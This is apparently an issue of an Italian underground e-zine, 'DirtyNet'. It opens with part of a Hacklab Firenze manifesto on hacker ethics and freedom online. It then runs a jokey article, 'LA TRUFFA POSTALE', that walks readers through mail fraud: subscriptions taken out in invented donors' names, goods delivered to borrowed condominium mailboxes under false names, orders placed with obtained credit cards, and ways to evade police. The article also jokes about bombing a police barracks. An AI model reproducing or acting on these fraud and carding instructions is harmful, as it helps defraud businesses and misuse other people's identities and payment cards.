MISURE DEL GENERE. Qui si vuole sfruttare il panico per colpire quelle possibilit di sfuggire allocchio onnipresente del controllo statale, che Internet ha dato a milioni di persone che hanno preso in contropiede stati e governi. Si profila un nuovo minaccioso attacco agli spazi di libert individuale in rete attraverso misure che in realt con la prevenzione di questi attacchi non hanno NULLA a che fare, e nuovamente siamo chiamati a rispondere. Ma va preso atto che rispetto a tutto questo, proprio la risposta della "comunit hacker" storica, dei "cyberpunk", di tutto il variopinto insieme degli utilizzatori e dei navigatori "alternativi" di Internet stata sinora debole ed ambigua. La reazione pi comune stata: "un attacco del genere roba da "lamer" (termine dispregiativo per indicare chi danneggia siti o pirateggia sofware avvalendosi di strumenti tecnici messi a disposizione da altri senza avere la comprensione di quello che sta facendo e la padronanza tecnica che caratterizzebero il "vero hacker") noi che centriamo?. Una reazione del genereconsiderando il fatto che in realt non si sa tuttora NIENTE sugli autori e sui moventi di chi ha compiuto lattacco, e che non certo luso di un software piuttosto che di un altro a poter dare qualche indicazione sulleffettivo livello di "lameraggine" degli autorici sembra pi che altro estremamente ipocrita ed intenzionata ad eludere i veri nodi del problema per tenere bassa la testa in un momento di crisi. Ancor pi esplicite in questo senso ci sembrano le reazioni di chi sta tentando di convincere i media che lhacker fondamentalmente un boy-scout che non danneggerebbe mai qualcosa, che si interessa solo di tecnica e che non domanda di meglio, una volta messa la testa a partito, che farsi assumere da qualche software house o da qualche agenzia di sorveglianza o polizia. Azzerando completamente il fatto che se davvero si intende agire in conformit al principio base de "linformazione vuole essere libera", allora spesso e volentieri ci si trova ad infrangere qualche legge dello stato (e di ci ci sono numerosi esempi storici) e che lavorare per polizie, agenzie di sorveglianza eccetera in totale contraddizione con questo principio. In questo varco di confusione, di incertezza, e di equivoco spesso voluto, si sta inserendo lavversario, che mentre criminalizza i comportamenti insubordinati cerca di enfatizzare a scopo di recupero politico ed economico (il talento dellhacker una risorsa preziosa sotto entrambi gli aspetti) lesistenza degli hacker "buoni". Buoni dal suo punto di vista, ovviamente: quelli che combattono la pedofilia in rete (magari al servizio di parroci isterici ed ossessionati come Don Fortunato di Noto), quelli che sorvegliano i terroristi, quelli che danno assistenza alle agenzie di polizia e se hanno commesso qualche "crimine" lo hanno fatto solo per leggerezza giovanile. Cos assistiamo al fatto che Kevin Mitnick,"cult-hero" della cultura underground su Internet, pluriprocessato e nemico pubblico numero uno USA per tanti anni, si trasforma di colpo in una figura "buona" per i media quando si appresta a fornire collaborazione al governo USA per indagare su questi attacchi. Vediamo la CIA fare appello agli hacker perch ha bisogno di nuovi talenti e vediamo decine di migliaia di giovani rispondere allappello... Questo non deve stupire pi di tanto. La cultura hacker e cyberpunk non sinora riuscita a sciogliere un nodo di fondo: lhacking puro possesso di capacit tecniche o anche scelta e responsabilit personale etica e politica? e quale scelta? Ma proprio su questo interrogativo che da oggi si gioca la partita. Sinora stato possibile alimentare lillusioneper chi voleva nascondere a se stesso e agli altri questo problemache la diffusione di Internet, della "cultura di rete" senza altre specificazioni, delle capacit tecnologiche "neutre", significasse automaticamente diffondere una nuova forma di libert. Questa illusionecome quella dell"anarchia intrinseca" di Internet stata consentita dal convergere di due fattori: il carattere di per s scarsamente gerarchico e difficilmente controllabile della rete, che ha permesso linsorgere in essa di comportamenti e spazi insubordinati, e linteresse del capitale finanziario e commerciale a massificare Internet, liberalizzando gli accessi e minimizzando i controlli in nome dello sviluppo del commercio elettronico. Questa fase vicina a chiudersi. Ha permesso lo sviluppo di una contraddizione notevole, perch Internet si trovata ad essere insieme "nuova frontiera" per la logica del profitto e mezzo di comunicazione di massa effettivamente "many to many", aperto a tutti e scarsamente governabile, dove individui e piccoli gruppi possono tuttora concorrere con successo sul piano comunicativo con governi e grandi gruppi di potere politico-economico in misura inimmaginabile per gli altri media, ma ora la situazione mutata. Lulteriore espansione del commercio elettronico e dei profitti non dipender pi dalla liberalizzazione degli accessi e dalla scarsa sorveglianza, ma dipender dal recupero della capacit di GOVERNARE la rete, o quanto meno dellillusione di essere in grado di farlo. Rispondere a questo necessita di una nuova maturit. Non pi possibile oggi fingere che il trastullarsi con i nuovi giocattoli tecnologici e cibernetici conduca da solo a risultati diversi dallinserirsi in un trend commerciale. Non pi possibile esorcizzare chi sottolinea questambiguit di fondo e la necessit di rompere con la logica del profitto e del potere, con laccusa sprezzante di essere un barbogio "veteroqualchecosista". Non pi possibile illudersi ed illudere che lo sbarco in forze dellindustria culturale e dello spettacolo su Internet (o lo sbarco di essa in questa industria, ricordiamo che stata America On Line a comprare la Warner Bros e non viceversa, alla faccia di chi ci raccontava che la comunicazione su Internet era di per s irriducibilmente antagonista agli altri media) rappresentino chiss quale progresso ed elemento di innovazione se non di liberazione. E viceversa non nemmeno pi possibile fingere che la smania di protagonismo e presenzialismo mediatico di tanti hacker, veri o presunti, alluda a qualcosa di sostanzialmente diverso dallo svendersi a questa industria e dallaccettare le regole che la macchina mediatica globale per la produzione del consenso al pensiero unico ti impone per darti visibilit positiva. Soprattutto, non pi possibile fingere che la passione e la capacit tecnologica, da sole o accompagnate tuttal pi da qualche orpello di irriverenza, da qualche comportamento e linguaggio "strani" che fanno tendenza, ma destituite di ogni altro senso e movente, possano condurre alla fin fine a risultati diversi dal buon posticino alla software-house o allarruolamento nella CIA. Per rispondere a questo scenario mutato occorre riflettere a fondo su cosa sia "hacking", senza eludere i problemi, senza accontentarsi di pararsi le chiappe da chi vorrebbe ridurlo a criminalit, senza preoccupazioni di notoriet mediatica e di risultare graditi al giornalista o allo sbirro di turno. Occorre maturare e portare avanti un NOSTRO concetto di hacking, senza lasciare che siano altri ad imporcelo. Occorre anche chiariree sino in fondoche chi fa danni immotivati, chi si diverte a danneggiare altri, chi impiega tempo risorse e saperi solo per cavarsi il gusto di rompere le palle a un pacifico user per affermare la propria presunta superiorit, o per danneggiare un sistema al solo scopo di esibirsi e godere di uneffimera notoriet, non per questo un hacker. Come non lo chi craccka e pirateggia solo per cavarci dei soldi. Ma non lo nemmeno chi supinamente accetta le leggi e le norme che vorrebbero imporci in rete governi e multinazionali, chi fa propria la logica del profitto innanzitutto, scegliendosi un lavoro legale invece del cracking, chi finisce per arruolarsi nella polizia o a fare il mercenario delle multinazionali. E non un caso che molti passino direttamente dal cieco vandalismo o allesibizionismo alla richiesta di arruolamento nella CIA. Noi non crediamo di stare dicendo con questo nulla di diverso come hacklab di Firenze da quanto abbiamo detto sino dalla prima nostra uscita pubblica. N nulla di diverso da quanto siamo andati dicendo a titolo personale o in altre situazioni ancora prima di dar vita allhacklab. Perch queste posizioni e questi ragionamenti non sono frutto unicamente delle nostre intelligenze personali, sono frutto dellintelligenza collettiva di rete. E condividiamo quanto questa intelligenza collettiva ha proposto in merito, da anni e anni. Noi quindi riaffermiamo che: 1) Intendiamo studiare e praticare il modo per garantirci in ogni caso la possibilit di comunicare e soddisfare i nostri bisogni e desideri anche attraverso le nuove tecnologie. Rivendichiamo innanzitutto il diritto di diffondere e acquisire liberamente le informazioni. In modo UNILATERALE se necessario, indipendentemente da leggi e normative. Ci assumiamo questa responsabilit perch riconosciamo a noi stessi la capacit di autogestire scelte comportamenti e responsabilit etiche e politiche in modo autonomo da quanto vorrebbero imporci stati, governi e maggioranze. 2) Intendiamo combattere la battaglia per mantenere Internet LIBERA il pi possibile, che per noi significa anche il meno possibile sottomessa alle esigenze di stati, governi, gruppi di potere economico ed agenzie di controllo e di spionaggio. Intendiamo combattere questa battaglia anche sul piano legislativo e normativo, con intelligenza politica e scioltezza tattica, senza rifiutare a priori lapporto di forze istituzionali, ma consapevoli innanzitutto che ci che governi e capitali chiamano "insicurezza" per noi innanzitutto "libert" e mettendo sempre al primo posto questo fatto. 3) Intendiamo studiare e praticare liberamente la possibilit di nuove forme di uso della tecnologia che abbiano in prospettiva lo stesso senso di libert e orizzontalit della comunicazione e dellinformazione che ha avuto Internet nei sui anni eroici, e collaborare con chi a questo sta gi lavorando, che a nostro giudizio merita lappellativo di "hacker" nella pienezza del suo senso originario pi di chiunque altro. Sulla base di quanto detto finora riteniamo infine importantissimo aprire una discussione il pi possibile allargata in rete sugli aspetti e le responsabilit etiche e politiche nellhacking. Proponiamo quindi che su questargomento venga aperto anche uno spazio fisico di discussione continuativa, aperta, orizzontale e non formalizzata da comportamenti politichesi quali ordini del giorno, mozioni finali ecceterache non ci appartengono perch oscurano la libera espressione e lassunzione di responsabilit personale. Proponiamo che questo spazio resti aperto per tutta la durata dellhackmeeting 2000 e che i contributi di chiunque interverr in esso siano ridiffusi in rete e che possano essere liberamente riprodotti e distribuiti senza scopo di lucro. Intendiamo naturalmente dare il necessario apporto, logistico e di dibattito, a tale spazio. Hacklab Firenze - 6 Marzo 2000 http://firenze.linux.it/~leandro/hacklab hacklab@firenze.linux.it Della serie "Chi cerca trova!!!!!!" hihi ===ooO===0===Ooo===oOOo===ooO===0===Ooo==--=Illegality=--====ooO===0===Ooo===oOOo===ooO===0===Ooo=== LA TRUFFA POSTALE questa skonosciuta!!! Autore: mR_bIs0n Consumo: ho la brutta abitudine di iniziare gli art prima di mangiare... eheh Abbigliamento: mutande (gialle davanti e marroni dietro) e kannottiera... Musica ascoltata: un po'di tutto del momento... naturalmente in MP3!!! Saluti a: Biby, Piccinni, Panino, Luigi, Faby e Simy (senn ki le sente...), qualkun'altro ke non rikordo, il kanale #Phreak.it, tutti quelli di AIS, XaRaBaS, gli operatori Telekom a kui ho rubato tanta roba... Fankulo a: i prof. di merda, alla skuola bastarda, a tutti i Lamerini, a ki mi sta sul kaxxo... Dedicato a: tutte le belle gnokke ke ci sono in Italia, e a quella scema dell'Ilaria ke prima di fidanzarsi kon qualkuno si fa le pere... --- Beeeeeeeeeneeeeeeeee, kome va? Tutto bien? Vi state divertendo? Bravi... Perk kazzo sto a dire ste kavolate??? .------------------------------------. | Indice | | 1)Intro | | 2)Truffa da casa propria | <--- Mitiko!!! | 3)Truffa da casa altrui | | 5)Karta di kredito | | 6)Riski | | 7)Kazzate ke mi verranno in mente... | -------------------------------------' - Intro Oggi vi illustrer varie teknike per la truffa via posta... ovvero il mail - truffing!!! Si, proprio, kos... farsi arrivare a kasa roba senza pagarla, ovviamente... Non uso disclaimer, quindi se i carabinieri o kikkessi vi arrestano per quello ke avete fatto leggendo qui (per fare un esempio, mettiamo ke avete letto kome fare a farsi un abbonamento ad una rivista, e voi vi fate una pera) io sono il responsabile, il mio nome Fabio Fanizza, oppure se vi piace di + Giuseppe Pasanisi, ditelo pure!!! A parte gli skerzi a me non me ne pu fregare un kazzo, tanto la pula o i carramba o quegli str***i della G.D.F. non sann nulla di me! AHAHAH (risata sadika)... - Truffa da casa propria Oki, la truffa da casa propria consiste nel far arrivare della roba a casa vostra... voi direte "ceeeeeerto! E la pago io!" NO! E'qui ke vi sbagliate, infatti i metodi ke vi illustrer faranno in modo ke voi non centriate un benamato kazzo... Bene, mettiamo ke volete abbonarvi a Topolino... A TOPOLINO??? Ma ke kazzo leggete? Evidentemente avete avuto problemi da pikkoli... dicevamo? Ah si! Volete abbonarvi a Topolino, bene non dovete fare altro ke trovare una kartolina d'abbonamento nelle riviste o nel Topolino stesso... ma attenzione! La cartolina deve essere di quelle ke possono regalare l'abbonamento! EHHEHE! Cio, una persona (es. Fabio Fanizza) vuole regalare un abbonamento a Topolino (casualmente) a voi... bene questa kartolina lo permette! BENE!!! Quindi kol fidato GenerID riempiamo la cartolina kon le generalit del "donatore", mentre nella sezione "donato" mettiamo i nostri datucci!!! Fatto? Bravi! Ora kome modalit di pagamento usiamo i bollettini, quanti pi possibili! Mirakkomando usate un paesino sperduto magari nella Valle D'Aosta per la residenza del "donatore"!!! Presto vi arriver il vostro amato giornalino (ma Topolino se la scopa mai Minnie???)! Sikkome avete ordinato una kosa ke arriva ogni settimana, forse potrebbero, quei bastardi della Walt Disney Italia, accorgersene ke i soldi non arrivano... e potrebbero non inviare + un caxxo... bastardi... Il bello di tutto sta ke voi non centrate davvero un caxxo! Infatti non avete rikiesto voi l'abbonamento quindi siete puliti! Se poi qualkuno (ignoro ki) vi akkusa di averlo rikiesto voi potrete sempre dire: "Kekazzvuoi? (Questo opzionabile), Kiunkue avrebbe potuto fare l'abbonamento per farmi uno skerzo! Fottiti (Idem)"... Mettiamo ora ke ora avete visto una kosa ke vi serve ma nella kartolina non c' la sezione del "donatore"... ke bastardi... vabb poko male... leggete + avanti... - Truffa da casa altrui Bene, volete komprarvi qualkosa o farvi abbonamento a kualkos'altro... nulla di + facile se per puro kaso avete qualke vostro amiko ke abita in un kondominio... ehehheh sapete ke ci sono tantiiiissssiiimeee cassette di posta... bene baster usarne una libera e appicircarvici un nome a cazzo (Es. Giuseppe Pasanisi)... fatto ci fate in modo ke la roba rikiesta sia pagata tramite bollettini... eheheh il gioko fatto!!! Skusate devo pisciare... fatto! Mi venuta fame (non mi sono nemmeno lavate le mani... hiihihih) Lettore skoglionato : "Ma ke palle! Mo'in mezzo all'artikolo questo si mette a a mangiare senza nemmeno lavarsi le mani..." Vabbene! Dicevamo per kaso ke un ragazzo non pu pi divertirsi dopo essere andato a Teatro??? Ah no! Oki, ma mettiamo ke kuello ke volete purtroppo kosta parekkio e bisogna pagarlo o per contrassegno (soldi in contanti al corriere) o per karta di kredito... leggete + avanti... - Karta di kredito Bene, bene... questo metodo mooolto teoriko, per il fatto ke per avere una karta di kredito ce ne vuole... comunque per prokurarsela leggetevi l'art di XaRaBaS su NewBies 5... oppure hackate visa.com kome mio cuggino... bene una volta avuta questa benedetta karta non dovete fare altro ke trovare una buona ubikazione per fare arrivare la roba... per esempio in un kondominio... bene, ora fate l'ordine, ma attenzione utilizzate una generalit fasulla... poi non mettete nessun numero telefoniko... se per ricevere la roba c' bisogno di essere rikiamati, kiamate da kabina voi dicendo ke per motivi di lavoro non avete il telefono a kasa... bene... dite anke ke per la roba deve arrivare possibilmente verso un certo orario e giorno (a voi + comodi), tanto kon la karta potete rikiedere kualsiasi metodo di spedizione! IHIHIHIH!!! Pure kuello ke ti arriva entro 1 giorno... eheheh tanto mika pagate voi! Una volta fatto tutto aspettate sotto nel kondominio il corriere firmate e vi portate via la roba... - Riski Bene, dovete sapere ke per il metodo di truffa da casa, non ci sono problemi, se proprio volete essere sikuri, kiamate l'ufficio abbonamenti della rivista o giornale ke sia e fatevi spedire un fax dove dice ke voi non centrate un kazzo kon la roba ke vi arriva regalata... Per la truffa da casa altrui, invece, il diskorzo kambia... non usate sempre la stessa ubikazione, state attenti a quei bast***i della G.D.F.... per essere sikuri fate saltare in aria la loro kaserma del ka**o... Per la karta di kredito state molto attenti... se fate un ordine da Internet allora non basta usare un proxy... vedete un po'voi... se lo fate da kartolina, da telefono (kabina ovviamente), fax (anonimo) o altro ke assolutamente anonimo va bene... Non siate stupidi... - Kazzate ke mi verranno in mente Oki siamo arrivati alla fine dell'art... vi ringrazio tutti quanti i miei ammiratori... alle ammiratrici (tre: una celebro-lesa, una kon gravi malformazioni all'alluce del piede destro e una ke si krede McGyver e kon un temperino e un rotolo di scotch mi costruisce un cellulare satellitare...) (spero ke non ci siano lettori ke potrebbero offendersi per il fatto ke sono celebro-lesi, o ke abbiano malformazioni all'alluce del piede destro o ke si kredono McGyver... skusate) Mo'ke vi diko +??? Kazzo sono le 3.15 e ci il corso di potenziamento di matematika... seeeeee corso di rekupero!!! Quindi vi saluto e vi lascio una favoletta ke non centra un kazzo kon tutto! La volpe, il gatto e la iena Un bel giorno una volpe e un gatto si contendevano un pezzo di karne di allevamento proveniente da Cernobil... mentre bisticciavano una iena, rapidamente, tolse il pezzo di karne e lo inghiott andandonese allegro allegro! Morale della favola, tra i due litiganti il terzo muore intossikato. CIAOOOOOOOOOOOOooooooooooooo............. mR_bIs0n ############################################################################################ FinE rivista numero "1" DirtyNet Ringraziamenti: Giovanna - per il suo contributo al sapore di latino... Norman^B^ - per lo studio del titolo, sollecitato da sYn Ghent - Il flashmaster del futuro! MinM - amicone di avatar. CameloT - da un mese frequenta la rete ed gia' un piccolo boss... COsMo^ - sto' Fserve cia' rotto basta, ma la simpatia no. mR.bIsOn - per la totale disponibilita' kEwL - per la totale disponibilita' (forse un po' ripetitivo) phaet - se non esisteva lo dovevano inventare! NCKxxx - anche se piccolo e sempre vivo! Aspettando in numero "2"..... ---=La matematica non un'opinione ---=Nulla si crea, nulla si distrugge, tutto si trasforma (Lavoisier)